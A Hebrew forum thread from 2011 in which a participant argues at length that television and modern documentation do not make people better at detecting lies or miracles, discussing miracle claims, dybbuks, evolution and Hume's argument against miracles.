הטיעון שבעקבות הטלויזיה אי אפשר לטעון שהאויב מובס, לא נכון עובדתית, מלחמת יום הכיפורים נקראת אצל הערבים 'ניצחון אוקטובר', כנ"ל מלחמת לבנון השניה. התקשורת הפלשתינאית 'מתעדת' שקרים עד לאין קץ החל מרצח מוחמד א'דורה (אפילו אם נניח שזה סרט אמיתי, ברור שאפשר להפיץ גם סרט שאינו אמיתי), וכלה בכל דבר אחר שהיא מציגה, סרט תיעודי הוא יצירה של במאי שיכול להיות סלקטיבי, ויכולה להיות השקר הגדול ביותר. ראיתי הרבה כאלו. דוקא משום שנראה שהוא רק מצלם ו'מתעד', השקר מתוחכם הרבה יותר. סרט תיעודי יכול להציג את ישראל כמפלצת, כאלו יצרו הנאצים, וכאלו יוצרים הפלשתינים ולפעמים גם ישראלים, וכן להיפך סרטים תיעודיים המציגים את ישראל כעדר כבשים המצלצלים בפעמוני משיח ברוך וערגה. הטלויזיה לא יותר מונעת שקרים מאשר יוצרת שקרים. היא רק כלי יותר מתוחכם לאמת או לשקר, לטוב או לרע, לרציונליזציה או להיפך, לדתיות או לחילוניות, הכל כפי רצונם של יוצרי התכנים.

אם נניח שהטלויזיה יכולה למנוע שקר מסוג אחד, זה לא מונע שקרים מסוג אחר. הפצת מידע אמיתי היא בעיה טכנית של השקרן, אבל היא לא הופכת את האדם למישהו שאי אפשר לשקר לו, יש צורך רק להתארגן כראוי ולהשתמש באותה מדיה כדי לשקר. הטלויזיה משקרת לנו יום יום ושעה שעה, וגורמת לנו לתת מכספינו עליו עמלנו במיטב כחינו עבור דברים שאין לנו שום צורך בהם, בעד הבטחות שקריות, קוראים לזה 'פרסומות' או 'מבצעים', אבל אין אחד מאיתנו שלא נפל פעם עם שקר לבן של מבצע כשהוא חשב שהוא עושה משהו משתלם והתברר לו אחרי הכוכביות שדפקו אותו וגנבו ממנו כסף. את זה לא היה אפשר לעשות לפני הטלויזיה. כך שההבדלים הטכניים לא משנים את האדם עצמו. כך גם המיילים של המתיחות השונות החל מהעוקץ הניגרי שהפיל מאות אלפים בפח וכלה בסתם מתיחות והודעות שקריות להיזהר מX וכו'. השאלה שלי לא היתה האם יש יותר ידע היום (ברור שכן) אלא האם השימוש בכלי תקשורת הופך את האדם ליותר חכם, יותר ממולח, מחזיק ידע שישמור אותו מליפול בפח, ועל זה התשובה היא: לא, באופן טכני הוא יכול לרכוש יותר ידע בנושא בו הוא רוצה להיזהר, אבל תמיד מתפתחות הדרכים לרמותו ולעבוד עליו, אותו כשרון שהשקיעו החרטומים בבי"ס לחרטומולוגיה, משקיעים הפרסומאים והפוליטיקאים כדי לשקר במצח נחושה וגם הדברים מצטלמים טוב ונראים נפלא, אנחנו משלמים כסף ומשקיעים זמן כדי לצפות בשקיקה כיצד מרמים אותנו, ולאחר מכן רצים כפתאים לפעול לפי התכנית של היועצים האסטרטגיים. אני לא נכנס להבדלים של שיטות עבודה, אלא לטבע האנושי הבסיסי בהכרה בין אמת לשקר, זה אינו משתנה.

(בנוגע לטיעונים על נסים, ארחיב שוב בתשובתי לייתכן בסמוך. אבל מה שכתבת שאין יותר תיאורים על ים שנבקע - שגוי, אין בכלל תיאורים שמתיימרים להיות בזמן המאורעות או סמוך להם על ים שנבקע באופן לא טבעי לא באופן שנתון לפרשנות, משהו שמליונים היו אמורים לדעת ממנו אם התרחש, בלי שום קשר לתקשורת וטלויזיה, בכל אופן לא משהו שידוע באלפיים השנים האחרונות. תיאורים נתונים לפרשנות לעומת זאת יש גם הרבה אחרי המצאת הטלויזיה, מריה הקדושה התגלתה במצרים ב1971 לעיני מאות אלפי בני אדם, וסיפורים כאלו שכיחים ביותר. לי למשל התגלה אורנג' לפני כ11 שנים, באחד מימי סוף הקיץ באמצע הצהריים השמים נצבעו בכתום, אובך כבד שרר וכל האופק היה צבוע בכתום. יחד אתי ראו את הדבר אלפי אנשים שמתגוררים באיזור שלי (ואני מאמין שיש הרבה אנשים מן הצופים כאן שזוכרים את היום הזה, אחת השכנות למשל החליטה שהמשיח מגיע ונעמדה להתפלל בדבקות). אם רק הייתי מאמין באורנג' בקלות הייתי רואה את העננים יוצרים אותיות כל שהן, או שהייתי מרגיש רעידה ברורה ביותר בגופי וגם שומע צלצולים, או בכל אופן מאמין לאבא שלי שראה את הסימנים האלו בין נבכי העננים (כמו אָמֵלִי), ומודה בהתרגשות שגם אני הייתי ברגע הגדול וצפיתי במלאכיו של ר' יונתן איבשיץ, מן הסתם אף הייתי מספר זאת מדי פורים לכל נכדי וצאצאי כן ירבו. זה בדיוק מה שהסברתי יפה בהודעתי השניה באשכול זה בענין מה שנתון לפרשנות).

-הקשר שאתה עושה בין מחקרים של מוטציות בנגיפים לבין האבולוציה הוא שגוי, אין שום קשר בין שני התחומים, המחקר של התאמת הנוגדנים לנגיף המשתנה, לא נובע כלל מהאבולוציה (-הנחה שמוצא המינים הוא ע"י מוטציות זה מזה), ולא משליך כלום על האבולוציה. המוטציות בנגיפים הם עובדה, והאבולוציה היא השערה על התרחשויות בעבר, ואין עובדה זו מאששת בכלום את ההשערה. המכנה המשותף היחיד הוא פעולתן של המוטציות, יש מה שאנו יודעים עליהן, ויש מה שאפשר לשער שהן עשו בעבר. זה כמו שאני אטען שעובדת היותה של מלכת בריטניה, תומכת בכך שה' הוא מלך העולם. כשם שהיא שולטת בבריטניה, כך ה' שולט בעולם, זו דרכם של מלכים!

-לגבי השפעת בריאתנות כן או לא, הכל תלוי מי הזרם המרכזי ומי השולט. אין ספק שבמדינה שתהיה בשליטה קתולית אמיתית, ללא הפרדה בין דת למדינה, וללא תלות בממסדים כמו הממסד האקדמי שיש לו רקע מחייב בינלאומי. הטלויזיה תוכיח השכם והערב תיעוד של בריאתנות, ורוב האוכלוסיה יקבלו את הדברים. אדם ממוצע אינו יכול לשפוט בין מאמר בריאתני ובין מאמר התפתחותני, מה שקובע הוא איזה מידע מעבירים ואיזה תיעוד מעבירים. העובדה שבחברה המערבית הזרם המרכזי או הדומיננטי יוצא מהנחות יסוד שונות - ידועה, ולכן ההשלכה של השפעות האינטרנט או הטלויזיה בהתאם לעמדות הבסיס של מעצבי הדעה, לא מחדשת לנו דבר. אני מניח שהטלויזיה בהודו, במדה והיא נתונה ברמה כל שהיא ביד האנשים שתורות המזרח הם נר לרגלם, מטיפה ומתעדת את גדולת קדושת הענין הנ"ל, ויש גם השפעה על ההמונים. מסקנה: הטלויזיה יכולה לעורר ביקורת וספקנות כלפי מיסטי בדיוק כמו כלפי אנטי מיסטי. ה'נעם אלימלך' לא מעודד ביקורת וספקנות כלפי 'צדיק הדור' אבל הוא מעודד ביקורת וספקנות כלפי 'גויים רשעים' אין ספק שאם תעבור בין בתריו תמצא שם המון דברים על הגויים שלא ידעת מעולם, וחוש הביקורת שלך כלפיהם עלול להתחדד ביחס ישיר למידת הסימפטיה שיש לך לטקטס ולבעליו.

-הרעיון של רצף נסים מתגלגל מתעלם מהנחת המוצא של הדיון שלי על זמן כתיבת התורה. בלי הנחה זו הדיון לא מתחיל. ברגע שעזבנו את זמן המאורעות, אין להשתמש במלה 'תיעוד'.

דדווח על תוכן פוגעני

נשלח ב-15/10/2011 23:10 לינק ישיר 

ייתכן

צר לי שההודעה ארוכה, איני מצפה שתכתוב לי תגובה תוך שעה, ולא תוך יום. קח זמן כרצונך, לי מרווחי הזמן  עדיפים.

-אני לא עוסק בשאלה אם יש עליה או ירידה של הדורות, ייתכן שיש מחזוריות / עליה / ירידה / או מצב סטטי, אני מדבר על המשותף הבסיסי לכל בני האדם, המוח ויכולותיו. אי אפשר לקבוע נוסחה ברורה, אבל אפשר להראות שאין שום יסוד לטעון לשינוי בסיסי של התמודדות עם שקר. כל מה שאני עושה הוא רק לטפל בהתנגדויות מראש, במקום לדבר על יציאת מצרים ולקפוץ ממנה לנושאים מופשטים, אני מדבר עליהם מראש. אני מגדיר את הגבולות של שקר וטעות, ואת מה שידוע לנו על המין האנושי. כדי שהדיון יהיה מחולק לחלקים ולא יסתעף עד אינסוף.

-נכון הערת כי במקרא אין ייצוג לדעה שאין אלהים, לא היתה יומרה כזו בעבר, אבל בהחלט היתה טענה של 'עזב אלהים את הארץ ואין ה' רואה' 'אין ה' בקרבנו', כך בישראל, וביון: 'האלים אינם מטרידים את עצמם ולא את זולתם' (אפיקורוס). לא קבעו ש'אין אלהים', אלא טענו שאינם רואים קשר בינו לבין החיים או שזה מחייב אותנו לעשות משהו או לחשוב משהו. לקחו את כל זה באיזי.

-כתבת:

'אני מניח כי גם לך ברור כי תפיסת עולם מיסטית יש בה כדי לגרום לאדם לראות בחוש דברים שאני ואתה לא נצליח לראות גם אם נתאמץ מאד. נכון, לא כל דבר, אבל יש הבדל בין תפיסת המציאות, הנובעת מאירועים מיסטיים, או בעלת השלכות מיסטיות, בין אנשים מן הישוב לבין בעלי אמונות שונות. הדוגמה מהמשיחיסטים מצוינת, עד כמה שזה נוגע לדיון על כל דבר, חוץ משאלת עובדת חיים חיותו בפועל של מהמשל"ו וכל המסתעף'.

כמובן, אך רק במה שנתון לפרשנות, כשמשיחיסט יסביר לך מה הוא מתכוין, ההבדל ביניכם יהיה רק ענין של פרשנות, הוא מכיר במציאות בדיוק כמוך. הוא רק יצר תורה מיסטית בדיוק כמו שבאגדה אמרו 'יעקב אבינו לא מת'. כמובן שהדמיון מביא אנשים להרבה יותר מכך, אבל אך ורק במה שנתון לפרשנות. מה שלך נראה כערפל, נראה לו כאותיות פורחות באויר. מה שנראה לך כצורה אופיינית של ברק נראה לו כקלשונו של נפטון.

כתבת עוד:

"מכאן, לעולם בו רוב תופעות הטבע נתפסו כפעולות ישירות של אילים. הנחה זו אינה נובעת מציורים וסמלים, אלא מתיעוד רב. אולי לאו דווקא מיום מתן תורה, אבל לאורך כל התקופה והרבה אחריה. יש לכך לא מעט הדים גם בתורה".

עם זה בדיוק אני מתווכח, אין שום דרך להוכיח הנחה זו, ואין שום תיעוד רב על כך, בודאי לא יותר מהתיעוד המוכיח שאנו כולנו היינו שפוטים של אסטרולוגיה. אבל איני מנסה להתעקש על כך כי זה לא ממש נוגע לטיעון שלי, אני לא בונה כלום על אחוזי האליליות או המעורבות הרגשית באמונתה, של אוכלוסיות העולם באלף השני לפנה"ס. רק רציתי להמחיש את הדעה הקדומה.

כתבת עוד:

"אין להתעלם גם מדלות אפשרות התיעוד והפצת מידע וחוסר הנגישות למידע, כולל אוריינות בסיסית, שהיה בה כדי לסייע להפיץ סיפורים ולמנוע ביקורת הכרחית, להקשות מאד על מי שבכל זאת רוצה לבקר ולהכחיש, ולהשתיק את קולות הביקורת וההכחשה אם היו".

אין ספק שבמקרה שצריכים מידע ואוריינות, יש פער של ידע בין אדם ממוצע היום לאדם ממוצע של פעם. לכן הדיון חייב להיות על מה שהאדם בהכרח יודע, לא על משהו שהוא צריך לחפש בספריות או לפצח נוסחאות וקודים מקצועיים.

אגב, גם בימי קדם היה תיעוד מסודר של החיים והאירועים, (לגבי תיעוד של צילום וכדו' אדבר להלן), בספריות האשוריות מלפני 3000 שנים ויותר נמצאו עשרות אלפי מסמכים מקוטלגים ומסודרים, אשורבניפל מנהל הספריה פיתח טכניקות לאמצעי אחסנה של המסמכים, בשלהי האלף השני לפנה"ס היתה ספריה באוגרית, במצרים, אצל החתים, הכרתים, העמים הקדומים ניהלו קודיפיקציה שמתארת בפרוטרוט אירועים, על פי לוחות שנה. גם אצלם לוו כל הפעולות במסמכים, מכירה, קניה, נישואין, גירושין, הסכמים בין אנשים, דיונים, תיאורים לאקוניים של המלך ומעשיו. ה'תיעוד' אינו המצאה מודרנית. דבר בעל ערך היה מתועד גם בימי קדם. זו סתם הערת אגב.

דיברת על הנהיה המתגברת לרפואה אלטרנטיבית. אני מסכים לתשובתו של "יהודי". אני רק רוצה להוסיף כי עד שזכינו לקבלת תורת המדע בידי אדם, כמעט כל הרפואה הייתה "אלטרנטיבית" במובן שהסתמכה רבות על השערות פרועות ופחות על ניסוי ובדיקה.

כמו רבים וטובים אני שואל 'מיהו יהודי'? לא שאלתי שאלה וגם לא מצאתי תשובה, רק הראיתי שהטלויזיה ואוטוסטראדת המידע לא בהכרח מספקת רציונליות או אמת, אלא מספקת תוכן לפי ביקוש והיצע. הניו איג' הוא דוגמא קטנה שאפילו בעולם המערבי זה יכול לקרות, למרות שאין זה לפי הנחות היסוד של הזרם המרכזי בחברה.

אתייחס שוב בהרחבה לדבריך בסיום:

"אנו יודעים כי ככל שאנשים נטו יותר לבדוק ולבדוק ולבדוק וככל שהשתכללו צורות התיעוד הישיר והמשתמר, פחתו והלכו הנסים והנפלאות.              

מי כמוך יודע, כי ככל שהציבור הליטאי הלך ונדבק בחיידק הטורף של המופתים, רבו מאד המופתים המתרחשים על ידי בעלי מופת ליטאיים".

הדברים ממש שגויים, מכמה וכמה בחינות.

אבל ראשית אקדים שהשאלה אם התרחשו נסים ונפלאות באלפיים השנים האחרונות, לא נוגעת כלל לשאלה שלנו, האם יש בעולם ובאדם רק חומר, האם אלהים התגלה בסדרת נסים וציווה סדרת ציוויים. אני באופן אישי גדלתי על התרבות המערבית שמכחישה נסים, ובשבילי זו דת השכונה, אבל היא בהחלט אקסיומה שאין לה שום הוכחה ואף לא אישוש.

ונחזור למציאות: נסים ונפלאות לא פחתו, אנשים שמאמינים בניסים רואים אותם כל הזמן, מוציאים ספרים וסרטים המתעדים את המקום שאירע הנס, מראיינים את האנשים, שאירע להם הנס, זה מתרחש גם בציבור החרדי, אבל גם אצל הנוצרים, המוסלמים, ההודים, וכל מקום אחר בו מאמינים בניסים, גגל ותמצא, הטכנולוגיה היטיבה גם עם מתעדי הנסים. יתירה מכך, דברים על טבעיים תועדו ונבדקו גם במתודות מדעיות, מה ששולל את קביעתך שככל שהתיעוד השתכלל הסיפורים פחתו, אנשי מדע מפורסמים כמו ריימונד, קיבלר-רוס, ריין, בדקו בדקדקנות ותיעדו הצלבת גירסאות רבות ושונות של חויות על טבעיות שגרמו לאנשים לספק מידע שלא יכלו לדעתו בדרך טבעית. זה שאני באופן אישי על פי דת השכונה שלי מסתייג מכך, לא משנה את העובדה בשטח שתיעוד מודרני מתעד גם ניסים. על הערך האובייקטיבי של תיעוד נסים אכתוב בסמוך.

כתבת שהטלויזיה ביטלה את הדיבוקים, והרי כולנו יודעים שזה לא נכון, האמונה בדיבוקים נחלשה מאד בחברה המערבית בתהליך שארך מאות שנים יחד עם שאר האמונות בביטויים של על טבע, בלי שום קשר לטלויזיה או לתיעוד. הרי גם בדורינו ראינו כמה וכמה דיבוקים, שההחלטה האם מדובר בדיבוק או לאו באה על ידי הפרשנות שלנו, הנובעת מההנחה של החברה המערבית. הטלויזיה לא תרמה מאומה לפרשנות שלנו. והצופים בערוצי הקודש דוקא הושפעו מהתקשורת שהדיבוק המצולם והמתועד הוא ההוכחה הגדולה ביותר לXY. העובדה שבאחד המקרים המדובק עצמו טען שלא היה בו דיבוק, גם היא סוג של פרשנות, בסופו של דבר הטיעון לדיבוק לא עובר דרך הפרשנות של האובייקט, מקובל קדוש חושב שהאובייקט עצמו לא יודע בכלל מה עובר עליו, והדיבוק היה ונברא כפי שניתן לראות בסרט. הדרוזים צופים בטלויזיה יותר ממני וממך, אבל אצלם הדיבוקים והגלגולים הם מעשים שבכל יום.

אחזור לתיעוד של הנסים, בשום מקום לא תמצא כותרת 'תיעוד של נס', מה שתלוי באיש החברה המערבית, כיון שזה מניח שהנסים אינם קיימים, הוא לא יקח אותם כאופציה. מה שכן תמצא הרבה זו הכותרת 'ממצא לא מוסבר', זו לא כותרת, זה משהו שקורה בכל מעבדה בסוף היום. לא שאני טוען שקרישנה עשה נס שאמולסיפייר לא יערבב בין שמן למים בתוך מבחנה 348, אני רק מדגים שממצאים לא מוסברים יש רבים מאד בכל תחום ובכל מקום. מניחים שישנו הסבר כל שהוא. מכיון שהנחת היסוד, האקסיומה הבלתי מוכחת היא שאין נסים. זה מיתוס שמונחל בעולם המערבי בהדרגה במשך מאות שנים, בלי שום קשר לאמצעי תקשורת. התקשורת לפני מאתיים שנה היתה פרימיטיבית בדומה מאד ללפני אלפיים שנה, והרבה פחות מהתקשורת באימפריה הפרסית שהיתה מדוייקת ממוקדת ומהירה.

זה רק פרט מהמיתוס הכללי על ערכו וסמכותו של המדע, שמונחל גם הוא כבר שנים רבות מאד, כמובן שההיקש מהמדע שאפשר לבחנו על ידי ניסוי וטעיה (זה שאיתו מגיעים לירח או נלחמים בחידקים) לבין החלק שאין לבחנו על ידי ניסוי וטעיה (זה שאיתו קובעים שאין מימד רוחני לעולם ושאינו אלא חומר), הוא מוטיב משמעותי בהנחלת המיתוס. אבל באופן כללי מדובר בדעה והשקפה שמונחלת לציבור על ידי חינוך ספרות וכדו'. השיא של האמונה במיתוס זה היה כנראה בשלהי המאה 19, התקופה בה גיבורי הספרות היו 'הפרופסורים', כמו אצל ארתור קונאן דויל, מארק טויין, ז'ול וורן, ועוד רבים, גיבורים אלו מילאו את התפקיד הרומנטי והנחשק שמילאו האלים במיתוס, וההומניסטים בספרות ההומניסטית בתקופה שקדמה. כך מלמדנו איש התבונה הכל יכולה שרלוק הולמס: "הבה נבחן את מצבנו בקור רוח, ווטסון, ראשית אני מניח שאיש משנינו אינו מוכן לקבל התערבות שטנית בעניני בני האדם, הבה נתחיל בכך שנבטל אפשרות זו לגמרי, יפה מאד", (ארתון קונאל דויל, מפנקסו של שרלוק הולמס חלק ג' עמ' 132, הרפתקת רגלו של השטן). המחצית השניה של המאה ה20 נתפסת כתקופה רומנטית יותר בה יש מעט יותר מקום למגוון של השקפות.

מכיון שנס הוא ענין של פרשנות, לפי טענת המאמינים בנסים כל אחד מאיתנו ראה הרבה נסים. ייתכן שעץ שקרס על הכביש שאחד מאיתנו ראה, היה נס, העץ לא היה צריך לקרוס, אלא שהוא קרס כדי לעכב אוטובוס כדי שצדיק אחד יוכל לתפוס אותו. ייתכן שבאיזה שהוא ספר של 'סיפורי השגחה פרטית' מופיע העץ שאני ראיתי קורס בסתם יום רגיל, בצירוף תמונה של הקריסה, ועדות של אותו צדיק על הצירוף המופלא שבדיוק קרה. זה נשמע בנאלי, אבל אודה ולא אבוש שגם אני בעצמי כשאני חווה צירוף מקרים לא יכול לדעת האם מדובר בנס. למען האמת אני קצת כן בוש, אבל בכל אופן אספר: לפני מספר שנים נסעתי עם משפחתי לאחת הערים באירופה, עם הגיעי לנמל התעופה המקורי התברר לי שהמזוודה ובה האוכל הכשר שהבאתי נעלמה בטרמינל, לא מדובר בעיר כמו לונדון או פריז בה יש יהודים ואוכל כשר. ובנוסף לכך תקלה טכנית בכרטיס האשראי גרמה לכך שלא יכלתי לשחרר את הרכב השכור שהזמנתי. מצאתי את עצמי בשדה תעופה זר, עם קבוצת ילדים רעבים ועייפים (לא היה אוכל כשר גם בטיסה), ללא שום יכולת תנועה (המלון שהזמנתי לא היה באיזור של תחבורה ציבורית, ולשהות בו בחוסר מעש היה כמובן חסר טעם). לא יאומן אבל יש ערים באירופה שאין בהם אפילו בית חב"ד. המעשה הכי רציונלי שיכלתי לעשות היה לקנות כרטיס חזרה לארץ. מישהו שהיה איתי עשה מעשה שנראה פחות רציונלי, התקשר ותרם כסף לארגון צדקה (אני חוזר ומצהיר, זה לא אני!!! אני מאד בעד צדקה, אבל בחיים לא אלך להתקשר ולתרום כדי להרויח טרמפ או משהו כזה), והנה ממש בסמוך ונראה למעשה הצדקה (נתון לפרשנות, אבל זה מה שהיה..) חולף על ידי אדם, ואומר: אני מכיר אותך, נפגשנו בתל אביב לפני שלש שנים. מסתבר שבמסגרת כל שהיא למדתי אתו גמרא פעם אחת במשך שעה. כיום הוא מתגורר בעיר זו ועוסק ב: תיירות, במקום הוא הוציא לי מהחברה רכב על שמו (עד היום איני מבין איך עשה דבר כזה), הביא אותי לחנות שמוכרת אוכל כשר, וסידר לי את המשך השהות על הצד היותר טוב. הסיפור יפה ואני מספר אותו, אע"פ שאין לי מושג אם באמת מדובר במשהו אקראי, או במשהו שקרה בזכות משהו. כל זאת כדי להמחיש שהנס הוא ענין של פרשנות.

דדווח על תוכן פוגעני

נשלח ב-15/10/2011 23:10 לינק ישיר 

כפי שכתבתי, כל הנושא של נסים באלפיים השנים האחרונות, אינו חלק מהדיון שלנו, והובא כאן על ידי המידיינים רק כדוגמא לחכמה כביכול שמעניקים אמצעי התקשורת המודרניים. על כך טענתי בשתיים: 1) אין קשר לאמצעי התקשורת, זו השקפה מערבית בת מאות שנים, מדינה אחרת תנחיל השקפה הפוכה ותעביר תיעודים וסיפורים של נסים, 2) גם אם הטכנולוגיה יוצרת בעיה לשקר סוג מסויים של שקר, היא מאפשרת סוגים אחרים מתוחכמים עוד יותר של שקר, האדם הוא אותו אדם. (הקרב בין הוירוס לאנטי וירוס היה ברמת הXT ונשאר גם ברמת המחשב המשוכלל ביותר).

אמנם יש קשר אחר לנושא שלנו, קשר ישיר, והוא טיעונו של דיויד יום שהובא לעיל. ניסיתי לדחות את הדיון בו, אבל כנראה שבכל אופן זה מגיע, כי כבר פיתחנו את נושא הניסים, ברמה שחבל לעזוב אותה כעת. בסוף דברי אומר את דעתי על טיעון דיויד יום.

קודם אני רוצה לטעון שאין אפשרות לתעד נסים בשום אמצעי, מאחר והנס אינו עובדה אלא פרשנות. כל מצב הנתפס בחושים הוא 'עובדה' ובשום אופן אינו נס, תופעה שנתפסת בחושים, אינה חורגת מההגדרה 'טבע', וניתן להסבירה כתוצר של 'גורמים טבעיים', קרי חוקי הטבע, התנהגות הטבע הידועה לנו. כאשר אנו רואים אדם מעופף באויר, אין זה סותר בהכרח את חוקי הטבע, שכן אפשר שרוח חזקה מעיפה אותו. ואפילו אם אנו עומדים תחתיו ואיננו חשים בשום רוח, אפשר שהרוח ממוקדת דוקא בו. או שהוא פולט מגופו גז מסויים הגורם לו לעוף. או שמישהו מושך אותו על ידי כבל שקוף. או שאנו מדמיינים את התופעה מסיבות שונות. וכך עוד הרבה אפשרויות אחרות. מה שקובע אם להגדיר אירוע זה כנס או כטבע היא הפרשנות האנושית. משהו שלא נתון לשום קנה מדה מדוייק, מדעי, פיזי.

באופן תיאורטי ייתכן מקרה הנראה כחריג, שייבדק על ידי מכשירי מדידה אשר לא ימצאו שום הסבר היכול לעמוד בקריטריונים של חוקי טבע. וזה יהווה כביכול הוכחה ל'נס'. אך מכיון שמקרה כזה לא קרה מעולם, אין הוא נוגע לדיון הכללי על נס וטבע, העוסק בנסים הידועים. ועוד: בלתי אפשרי להכריז על מכשירי מדידה שאינם יכולים להיות מוטים על ידי שום תופעת טבע, שלוקחים את כל האפשרויות בחשבון, ושמודעים לכל הסיטואציות של כל חוקי הטבע וכל מצבי הצבירה של כל האטומים שביקום וכו'. הדיון יעבור לרמת המכשירים, ואם ננסה לאמת את המכשירים, הדיון יעבור לרמת האימות וכך עד אינסוף.

ניתן לטעון שנס הוא חוייה שאינה נתפסת בחושים, טענה שנשמעת קצת סותרת את עצמה. אבל בלי להיכנס לויכוח על ההגדרה, הרגשות האנושיים של כעס, אהבה, חמלה, אינם תופעה פיזית (למרות שיש להם השלכות פיזיות). אך הם מוגדרים כטבע, כי הם התנהגות קבועה של האדם. פאטה מורגנה מצד אחד 'אינה נתפסת בחושים', מן הצד השני היא טבע. או יותר נכון: עצם העובדה שפאטה מורגנה נתפסת לכאורה בחוש הראיה, על אף שאיננה במציאות, מוכיחה שההבדל בין נס לטבע איננו יכול להיות מוגדר בשום הגדרה חותכת.

כמובן שבאופן טבעי יאמר כל אחד מאתנו: "מדוע לחשוב שיש רוח שמעיפה איש מסויים באופן אישי?". אבל אל לנו לשכוח שצירופי מקרים או תחבולות היו מעולם ויהיו תמיד. ויש מי שיאמר באופן טבעי: "מדוע לחשוב שיש נסים?". ההחלטה מה צירוף מקרים ומה נס, היא החלטה אנושית העוסקת בגורמי האירוע, ולא באירוע עצמו. נניח שראינו איש מעופף, ונוצר ויכוח האם מדובר בנס או בתחבולה / צירוף מקרים. נקיטת עמדה בויכוח זה אינה נובעת משום קריטריון מובחן, אלא מתוך הבנה פשוטה, אינטואיציה. מי שמניח כי אין ולא היו נסים, יקבל בקלות את הרעיון של צירופי מקרים. מי שמוכן לקבל את הרעיון של נסים, יקבל את העדות על נס, כל שהיא חורגת מגבול מסויים של צירופי מקרים, ושתואמת את השקפתו בנוגע לסיבתם של נסים.

לפיכך אין שום דרך לתעד נס, נכון הדבר שמי שמניח שאין נסים ראשית מכחיש את התופעה עצמה, ובאופן תיאורטי צילום של התופעה יכול להטרידו, אבל גם כאן צריכים לתעד את התיעוד, מי צילם וכיצד, האם לא ערך את התמונה, האם התמונה לא סלקטיבית, האם נקודת מבטו של הצופה כוללת את כל הגורמים האפשריים (ברור שלא). אין תיעוד שלא יכול לסבול משום פגם תיאורטי, ושוב הדברים תלויים בפרשנות. אדם שמניח שאין נסים יקבל גם צירוף מקרים מאז מפתיע, כאקראיות בתואם להנחת היסוד שלו, ואדם שמניח שיש נסים, יניח שגם אותו אדם שקיבל 7 מכות ברק, חטא בחטא נורא ואיום שזו בדיוק האזהרה המיועדת לו משמים. האגדה שהכותל בוכה (בקטע החומה המערבית שנחשף במנהרות ישנו טפטוף מתמיד) מתפרשת על ידי אנשים שונים כזרימה מבורות עתיקים שנתונים בחללים שתחת הר הבית, אודה שגם אני מניח כך, כפי דת השכונה שלי, אבל זו רק פרשנות, אי לנו אפשרות לחפור ולבדוק בהר הבית, ולכן מי שמאמין בנס טוען שהכותל בוכה, ומי שלא מניח שיש סיבה טבעית. במקרה זה הוא מציע שיש בורות מים, אני בטוח שגם אם יתברר שאין שם בורות מים איש מדע לא יגיע למסקנה שהכותל בוכה, אלא יניח הנחה אחרת, או ישאיר את הדבר כתופעת טבע בלתי מוסברת.

זה מלמד שכל הטיעון שכביכול הטכנולוגיה והתיעוד מצמצמים את הסיפורים על נסים, הוא בלתי אפשרי גם באופן תיאורטי. המושג 'נס' אינו משהו שנתון לתיעוד או לאי תיעוד, הוא רק פרשנות אנושית. התיעוד מראה לנו מעגלי ענק בשדות, ואנו מפרשים האם מדובר בחיזרים, אקראיות, או מהתלה. הנסיונות לבדוק ולתעד את התיעוד, הם שוב נתונים תמיד לפרשנות ותמיד סובייקטיביים.

ומה יש למדע לומר? למדע אין שום אמירה בנוגע להתרחשויות ואירועים, אלא אך ורק בנוגע לקבועים. התרחשויות הם 'מדעי הרוח', בצד מדעי הבישול מדעי הריקוד והריאליטי, מנסים אנשים חכמים גם לכמת ולבדוק אירועים והתרחשויות, אבל זה לא מדע, זו פרשנות אישית. אם היה טיעון לנס תמידי, היה המדע יכול לבדוק זאת בשיטות היסודיות של המדע, אבל כל הרעיון של נס הוא חריגה מהקבוע. יש הרי הרבה תופעות בלתי מוסברות שאין ויכוח שהן קיימות, אבל הן לא נס, אלא רק תופעות בלתי מוסברות. וכמובן שגם ההסבר המדעי אינו מסביר באמת אלא רק מצמצם את ההסברים לכמות ההנחות הפחותה ביותר. הטיעון לנס הוא בדרך כלל טיעון בדיעבד, נס התרחש בעבר, זה משהו שאי אפשר לבדוק באופן מוחלט, ותמיד נתון לפרשנות.

אעפ"כ לאנשי מדע יש אפשרות לבדוק ולבלוש אחרי טיעון ספציפי, א' טוען שכאן התרחש אירוע פלוני, אפשר לחפש עקבות ולראות אם יש עקבות או להיפך. אבל עדיין: בד"כ מדובר בענין סובייקטיבי, והעיקר :תמיד צריך את הפרשנות. נניח שיש עקבות למשהו שהתרחש, אין זה מוכיח את האירוע כולו ובודאי לא את הפרשנות שלו שמדובר במשהו לא טבעי. הכחשת המופתים באה מהנחת יסוד, אע"פ שהרבה מלומדים ואנשי מדע תיעדו בצורה מסודרת אלפי דיווחים על אירועים שמוגדרים כלא טבעיים, כפי שציינתי לעיל.

מה אומר דיויד יום? הוא שואל שאלה: האם התרחשו בעולם נסים? ומשיב: יש אמנם דיווחים על נסים, אבל מכיון שידוע לנו בבירור שבעולם יש יותר נוכלים מאשר נסים, ושנוכלים מייצרים דיווחים על נסים. הרי אין צורך בנסים כדי להסביר את הדיווח. (הניסוח והמבנה שלי, אפשר להציג את הדברים בעוד צורות).

ועל כך אני טוען, ראשית, יום שאל שאלה יפה וטובה אבל לא השיב תשובה. אנו לא יודעים אם יש בעולם רק חומר, אם יש לאדם ולעולם גם מימד רוחני. אנו שונאים את הנוכלים שמנסים למכור לנו מידע מזוייף בנושא. עד כאן הסכמה. אבל כאשר אנו שואלים שאלה, פירוש הדבר שיש לנו שתי אפשרויות, אנו מניחים שייתכן שהתרחשו אי שם נסים, וייתכן שלא התרחשו. אך דא עקא, שלאחר תשובתו של יום, עולה בבירור, שגם אם התרחשו נסים באיזה שהוא מקום או יתרחשו בעתיד, לא נדע עליהם, כי בנינו מודל שגורם לנו להניח מראש שלא נקבל דיווחים על נסים. מכיון שהנחנו בשאלה שייתכן שהתרחשו נסים, הרי נשארנו בשאלה, ייתכן שהתרחשו נסים, אבל לעולם לא נדע עליהם כי אנו מניחים שכל דפריש מרובא פריש ולכן אין מידע על נסים. אם אנו שואלים שאלה בנוגע לנסים, עלינו לקבוע מראש לאיזה סוג של תיעוד נאמין, אם זו אפשרות שאין לנו שום הנחה נגדה, הרי שתיעוד אמין יספיק, לא צריך יותר.

